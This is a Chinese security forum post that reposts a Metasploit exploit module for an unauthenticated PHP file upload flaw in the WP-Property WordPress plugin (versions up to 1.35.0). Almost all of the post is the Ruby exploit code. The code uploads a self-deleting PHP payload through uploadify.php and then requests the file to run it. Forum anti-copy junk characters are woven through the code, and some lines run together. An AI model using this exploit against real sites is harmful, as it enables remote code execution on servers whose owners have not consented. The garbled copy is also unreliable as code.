找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2359|回复: 0
打印 上一主题 下一主题

WordPress WP-Property PHP 文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-4 19:51:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
WordPress WP-Property PHP 文件上传漏洞8 C* y6 e! Y- P2 j
9 K% S3 a/ S& Y
## # This file is part of the Metasploit Framework and may be subject to
; t4 q5 J6 ?5 e! I! h* |* J3 g# k* \6 E1 v" g# L, N( R! u) E9 a2 g" r
# redistribution and commercial restrictions. Please see the Metasploit# L8 K1 c& h( |: p6 i8 ?  d
' e; s6 K9 X/ S" P. v
# Framework web site for more information on licensing and terms of use.& ?- Q- [, s( B, ~8 R, N1 T

. f7 e3 ^9 l+ H2 z: r#   http://metasploit.com/framework/ ##  O0 V' p& w' [3 @" K7 {9 _% E$ |

; k, n; }* a4 X! o4 g 1 ?# r2 C* Z, n/ ~

* ~+ z/ q, W' H" [: W) z , Y3 ?2 T, k/ w! P

& k2 o  o) ]$ k4 k, f2 vrequire 'msf/core'
. r" \4 S" r* A" C+ ?  f5 Nrequire 'msf/core/exploit/php_exe'
7 Q8 n/ K4 D; ~3 d, @' p* J1 k8 ~* F* v/ ^0 {# U: y* V* \# j
class Metasploit3 < Msf::Exploit::Remote     Rank = ExcellentRanking       include Msf::Exploit::Remote::HttpClient     include Msf::Exploit:hpEXE       def initialize(info = {})         super(update_info(info,             'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
3 @# g$ g( k. q4 W  M'Description'    => %q{
. g, i9 `" f0 ^- s* oThis module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress                 plugin. By abusing the uploadify.php file, a malicious user can upload a file to a                 temp directory without authentication, which results in arbitrary code execution.             },             'Author'         =>% C; u1 v) k6 k" ~/ u1 R8 T( r
[
5 \; v( C9 X. {0 X, P- g# z'Sammy FORGIT', # initial discovery) |5 N2 S9 t0 m: h' Z2 W
'James Fitts <fitts.james[at]gmail.com>' # metasploit module
! c4 ~7 \& K- ]2 \8 w. ?' b],
- s( g& c1 x  W'License'        => MSF_LICENSE,, @$ _2 }" v9 V8 y
'References'     =>+ Y  }$ A+ E1 ^( i
[
. t  C" l- B* {7 w[ 'OSVDB', '82656' ],, E4 r8 ?7 i4 c% s8 m6 G+ m# t
[ 'BID', '53787' ],
1 G' Q, N; b1 ^' P# I% J8 k[ 'EDB', '18987'],, X, h4 |  I& q, j  J( Y) K
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]. N! g- w9 E* n4 \6 @
],- r  u- k1 O1 k2 p8 d: `
'Payload'        =>- [7 s% @) [# y' {/ e. H+ V
{! H) Z+ \* _9 I1 A. \& ?
'BadChars' => "\x00",
) {/ A! K! v9 I},; w( o' k7 r* S" k! ]* x, Y
'Platform'       => 'php',, O- r, [2 G) g" a2 w
'Arch'           => ARCH_PHP,
/ Z! B* b$ O, k# b& t# J: O'Targets'        =>, u( z: K  |8 S
[
, {4 [+ g0 U' ^* D' P[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
1 X9 L  \# v: D! M8 U[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
, L# ]* q2 T8 ]. m, Y4 P( ^  r],
" f. f# e- M; u+ S) \6 z3 P'DefaultTarget'  => 0,
3 N0 \& k# g+ l7 I5 |8 }'DisclosureDate' => 'Mar 26 2012'))
; z# |, s9 e; J
! ?/ W; Z% i/ J, u- Wregister_options(
5 n2 }% ]( L( G4 K6 b[
6 f% w$ W: }) l: T' x, ?OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
% k) k, g9 F6 ^! b- ]2 B], self.class)
% l3 }& J5 k9 [" f+ a- D$ Fend
: N% K0 [* j0 X) h
& `( v( }& ]' V) {5 w! r: Mdef check
3 e- E0 h: i/ p. X0 Kuri =  target_uri.path1 A" x) C' C5 n! b1 O# u) R+ I8 V" ~
uri << '/' if uri[-1,1] != '/'           res = send_request_cgi({             'method' => 'GET',
5 \  q0 ]2 J! `" @'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
2 V5 s- _& i: y% U5 H})
7 _( r6 V% v  S" w/ Z  r# H
9 |3 M% o  h8 y3 ?  I0 Kif not res or res.code != 200/ D8 d+ _0 x+ k  h1 @6 ?
return Exploit::CheckCode::Unknown/ F0 l/ _9 p! t2 w" |
end
" _" I4 K8 v; Z$ Z" F1 v/ [5 d' {% Y, v, e) ^
return Exploit::CheckCode::Appears, w$ O8 c+ R2 N) ?. y
end: y" v& C/ U& W

6 T+ p% O4 T2 K8 g; bdef exploit3 a7 n# s' ^: q: ^1 g
uri =  target_uri.path9 W% A" X: Q' ?) e3 z. q) x; [  T
uri << '/' if uri[-1,1] != '/'           peer = "#{rhost}:#{rport}"           @payload_name = "#{rand_text_alpha(5)}.php"         php_payload = get_write_exec_payload(:unlink_self=>true)8 W7 r  E; p- d( ^$ r) U# z7 s' K

' G- ^1 E5 h" r$ R8 ^data = Rex::MIME::Message.new
( ]5 b! G2 K& z; d* H" x9 \data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")5 ?; w7 x+ E1 ?
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
3 w% ~" N+ q4 d4 Z, A; Gpost_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')6 B8 J5 v+ y$ ^3 C2 \1 \% q

6 x7 V0 `. U! {: h" hprint_status("#{peer} - Uploading payload #{@payload_name}")
7 \& G7 G& K  g  nres = send_request_cgi({* M% u, X- f& z* V! H* S
'method' => 'POST',. m6 ~1 l7 R# i0 U$ P1 T& [
'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",% @6 H5 V% c4 f% `6 n, |
'ctype'  => "multipart/form-data; boundary=#{data.bound}",
3 f; ]0 h2 s8 m'data'   => post_data# q" A: b& g5 ~9 R0 H4 p
})
! b; v3 w4 |# I; ?9 ^( {5 m) J$ H" J( R1 M& ]; c! c
if not res or res.code != 200 or res.body !~ /#{@payload_name}/
! m4 g0 U+ d9 d- A6 Mfail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
3 p. W! `4 \( g" p, J% \end
+ c4 Q, l/ c: r8 C
9 `, l: X6 n. C1 G; Z# H" bupload_uri = res.body
5 R4 l; e+ Y8 n9 y; Y  @% q* c5 Q0 ~1 {: ^+ l' O+ K5 ^
print_status("#{peer} - Executing payload #{@payload_name}"). m5 K; p) O. Z4 ?/ i# Y
res = send_request_raw({
2 i7 E* O: d! |5 q& {4 Z( i7 ^1 ?'uri'    => upload_uri,
" c9 e9 I# S! ^) S8 e'method' => 'GET'- h- b1 E2 L# }; y: [
})
9 J# Y+ b* ^3 d$ ^. W2 A9 lend$ B( {" l8 n/ ~+ w* S
end  i) P* q2 ^4 g
% Z, {& S  c9 R/ R
不要问我这写的是什么 怎么利用 我是说msf." g% s- R, Q! G% J8 T
4 L! {! n/ g! c8 J0 x8 ~" r3 E' F1 L
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表